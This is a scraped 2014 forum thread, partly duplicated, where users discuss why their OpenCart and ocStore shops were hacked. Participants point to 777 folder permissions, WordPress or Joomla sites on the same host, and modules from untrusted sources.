sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку
2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options...
sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0
Recommended Posts